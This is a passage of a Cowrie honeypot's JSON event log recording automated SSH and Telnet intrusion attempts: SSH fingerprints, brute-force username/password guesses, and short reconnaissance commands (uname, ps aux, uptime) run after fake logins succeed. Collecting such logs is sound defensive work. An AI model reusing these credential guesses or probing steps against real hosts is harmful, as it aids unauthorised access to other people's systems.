enssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:15:10.360142Z","src_ip":"212.227.235.229","session":"16baed530d22"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:15:10.668336Z","src_ip":"212.227.235.229","session":"16baed530d22"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:15:10.736738Z","src_ip":"212.227.235.229","session":"16baed530d22"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:15:10.737800Z","src_ip":"212.227.235.229","session":"a7bae54fb18c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52582,"dst_ip":"1.2.3.4","dst_port":22,"session":"f7cfa13847dd","protocol":"ssh","message":"New connection: 212.227.125.160:52582 (1.2.3.4:22) [session: f7cfa13847dd]","sensor":"my-vps","timestamp":"2025-08-31T01:15:13.201094Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:15:14.409363Z","src_ip":"212.227.125.160","session":"f7cfa13847dd"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:15:14.410087Z","src_ip":"212.227.125.160","session":"f7cfa13847dd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37520,"dst_ip":"1.2.3.4","dst_port":22,"session":"622b0d9c1481","protocol":"ssh","message":"New connection: 212.227.125.160:37520 (1.2.3.4:22) [session: 622b0d9c1481]","sensor":"my-vps","timestamp":"2025-08-31T01:15:14.838919Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:15:14.840007Z","src_ip":"212.227.125.160","session":"622b0d9c1481"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:15:14.918796Z","src_ip":"212.227.125.160","session":"622b0d9c1481"}
{"eventid":"cowrie.login.success","username":"root","password":"passwd","message":"login attempt [root/passwd] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:15:15.157687Z","src_ip":"212.227.125.160","session":"622b0d9c1481"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:15:15.474730Z","src_ip":"212.227.125.160","session":"622b0d9c1481"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T01:15:15.475397Z","src_ip":"212.227.125.160","session":"622b0d9c1481"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:15:15.550103Z","src_ip":"212.227.125.160","session":"622b0d9c1481"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:15:15.551589Z","src_ip":"212.227.125.160","session":"622b0d9c1481"}
{"eventid":"cowrie.session.connect","src_ip":"102.88.137.80","src_port":17458,"dst_ip":"1.2.3.4","dst_port":22,"session":"292de8c1a048","protocol":"ssh","message":"New connection: 102.88.137.80:17458 (1.2.3.4:22) [session: 292de8c1a048]","sensor":"my-vps","timestamp":"2025-08-31T01:15:15.758328Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:15:15.759039Z","src_ip":"102.88.137.80","session":"292de8c1a048"}
{"eventid":"cowrie.client.kex","hassh":"713bd9cc935561939c02dad25af2d3de","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes256-ctr","aes256-cbc","aes128-gcm@openssh.com","aes128-ctr","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 713bd9cc935561939c02dad25af2d3de","sensor":"my-vps","timestamp":"2025-08-31T01:15:15.881851Z","src_ip":"102.88.137.80","session":"292de8c1a048"}
{"eventid":"cowrie.login.failed","username":"xxt","password":"xxt","message":"login attempt [xxt/xxt] failed","sensor":"my-vps","timestamp":"2025-08-31T01:15:16.414362Z","src_ip":"102.88.137.80","session":"292de8c1a048"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:15:17.539807Z","src_ip":"102.88.137.80","session":"292de8c1a048"}
{"eventid":"cowrie.login.success","username":"root","password":"Mafra102030","message":"login attempt [root/Mafra102030] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:15:21.919988Z","src_ip":"212.227.125.160","session":"f7cfa13847dd"}
{"eventid":"cowrie.session.closed","duration":31.58813238143921,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:15:23.330928Z","src_ip":"212.227.125.160","session":"4ce6021c13dd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:15:24.910322Z","src_ip":"212.227.125.160","session":"f7cfa13847dd"}
{"eventid":"cowrie.command.input","input":"ps aux | head -10","message":"CMD: ps aux | head -10","sensor":"my-vps","timestamp":"2025-08-31T01:15:24.911155Z","src_ip":"212.227.125.160","session":"f7cfa13847dd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54832,"dst_ip":"1.2.3.4","dst_port":22,"session":"c22bd8c657cd","protocol":"ssh","message":"New connection: 212.227.125.160:54832 (1.2.3.4:22) [session: c22bd8c657cd]","sensor":"my-vps","timestamp":"2025-08-31T01:15:25.353961Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:15:25.354885Z","src_ip":"212.227.125.160","session":"c22bd8c657cd"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:15:25.429599Z","src_ip":"212.227.125.160","session":"c22bd8c657cd"}
{"eventid":"cowrie.login.failed","username":"yarn","password":"yarn","message":"login attempt [yarn/yarn] failed","sensor":"my-vps","timestamp":"2025-08-31T01:15:25.680397Z","src_ip":"212.227.125.160","session":"c22bd8c657cd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767","size":28,"shasum":"e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767","duplicate":true,"duration":"1.6","message":"Closing TTY Log: var/lib/cowrie/tty/e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767 after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:15:26.532729Z","src_ip":"212.227.125.160","session":"f7cfa13847dd"}
{"eventid":"cowrie.session.closed","duration":"13.3","message":"Connection lost after 13.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:15:26.534422Z","src_ip":"212.227.125.160","session":"f7cfa13847dd"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:15:26.812941Z","src_ip":"212.227.125.160","session":"c22bd8c657cd"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":37120,"dst_ip":"1.2.3.4","dst_port":22,"session":"90b5a2581bf0","protocol":"ssh","message":"New connection: 201.148.180.50:37120 (1.2.3.4:22) [session: 90b5a2581bf0]","sensor":"my-vps","timestamp":"2025-08-31T01:15:32.964864Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:15:34.157817Z","src_ip":"201.148.180.50","session":"90b5a2581bf0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:15:34.158589Z","src_ip":"201.148.180.50","session":"90b5a2581bf0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44962,"dst_ip":"1.2.3.4","dst_port":22,"session":"1d1e17fd838d","protocol":"ssh","message":"New connection: 212.227.125.160:44962 (1.2.3.4:22) [session: 1d1e17fd838d]","sensor":"my-vps","timestamp":"2025-08-31T01:15:35.819116Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:15:35.820017Z","src_ip":"212.227.125.160","session":"1d1e17fd838d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:15:35.893770Z","src_ip":"212.227.125.160","session":"1d1e17fd838d"}
{"eventid":"cowrie.login.failed","username":"test2","password":"test2","message":"login attempt [test2/test2] failed","sensor":"my-vps","timestamp":"2025-08-31T01:15:36.127866Z","src_ip":"212.227.125.160","session":"1d1e17fd838d"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:15:37.202758Z","src_ip":"212.227.125.160","session":"1d1e17fd838d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47418,"dst_ip":"1.2.3.4","dst_port":22,"session":"16bf8c7286ea","protocol":"ssh","message":"New connection: 212.227.235.229:47418 (1.2.3.4:22) [session: 16bf8c7286ea]","sensor":"my-vps","timestamp":"2025-08-31T01:15:39.935374Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:15:40.661018Z","src_ip":"212.227.235.229","session":"16bf8c7286ea"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:15:40.661706Z","src_ip":"212.227.235.229","session":"16bf8c7286ea"}
{"eventid":"cowrie.login.success","username":"root","password":"Mafra102030","message":"login attempt [root/Mafra102030] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:15:41.106850Z","src_ip":"201.148.180.50","session":"90b5a2581bf0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:15:44.800432Z","src_ip":"201.148.180.50","session":"90b5a2581bf0"}
{"eventid":"cowrie.command.input","input":"uptime","message":"CMD: uptime","sensor":"my-vps","timestamp":"2025-08-31T01:15:44.801151Z","src_ip":"201.148.180.50","session":"90b5a2581bf0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48656,"dst_ip":"1.2.3.4","dst_port":22,"session":"2e24177cb075","protocol":"ssh","message":"New connection: 212.227.125.160:48656 (1.2.3.4:22) [session: 2e24177cb075]","sensor":"my-vps","timestamp":"2025-08-31T01:15:46.300086Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:15:46.301370Z","src_ip":"212.227.125.160","session":"2e24177cb075"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:15:46.376105Z","src_ip":"212.227.125.160","session":"2e24177cb075"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802","size":69,"shasum":"dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802","duplicate":true,"duration":"1.7","message":"Closing TTY Log: var/lib/cowrie/tty/dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802 after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:15:46.473826Z","src_ip":"201.148.180.50","session":"90b5a2581bf0"}
{"eventid":"cowrie.session.closed","duration":"13.5","message":"Connection lost after 13.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:15:46.475060Z","src_ip":"201.148.180.50","session":"90b5a2581bf0"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"oracle123","message":"login attempt [oracle/oracle123] failed","sensor":"my-vps","timestamp":"2025-08-31T01:15:46.635103Z","src_ip":"212.227.125.160","session":"2e24177cb075"}
{"eventid":"cowrie.login.failed","username":"dev","password":"password1","message":"login attempt [dev/password1] failed","sensor":"my-vps","timestamp":"2025-08-31T01:15:46.919957Z","src_ip":"212.227.235.229","session":"16bf8c7286ea"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:15:47.781970Z","src_ip":"212.227.125.160","session":"2e24177cb075"}
{"eventid":"cowrie.session.closed","duration":"8.4","message":"Connection lost after 8.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:15:48.378871Z","src_ip":"212.227.235.229","session":"16bf8c7286ea"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60790,"dst_ip":"1.2.3.4","dst_port":23,"session":"231c4dad7739","protocol":"telnet","message":"New connection: 212.227.125.160:60790 (1.2.3.4:23) [session: 231c4dad7739]","sensor":"my-vps","timestamp":"2025-08-31T01:15:52.652280Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46050,"dst_ip":"1.2.3.4","dst_port":22,"session":"53df189e5d95","protocol":"ssh","message":"New connection: 212.227.125.160:46050 (1.2.3.4:22) [session: 53df189e5d95]","sensor":"my-vps","timestamp":"2025-08-31T01:15:56.763745Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:15:56.764618Z","src_ip":"212.227.125.160","session":"53df189e5d95"}
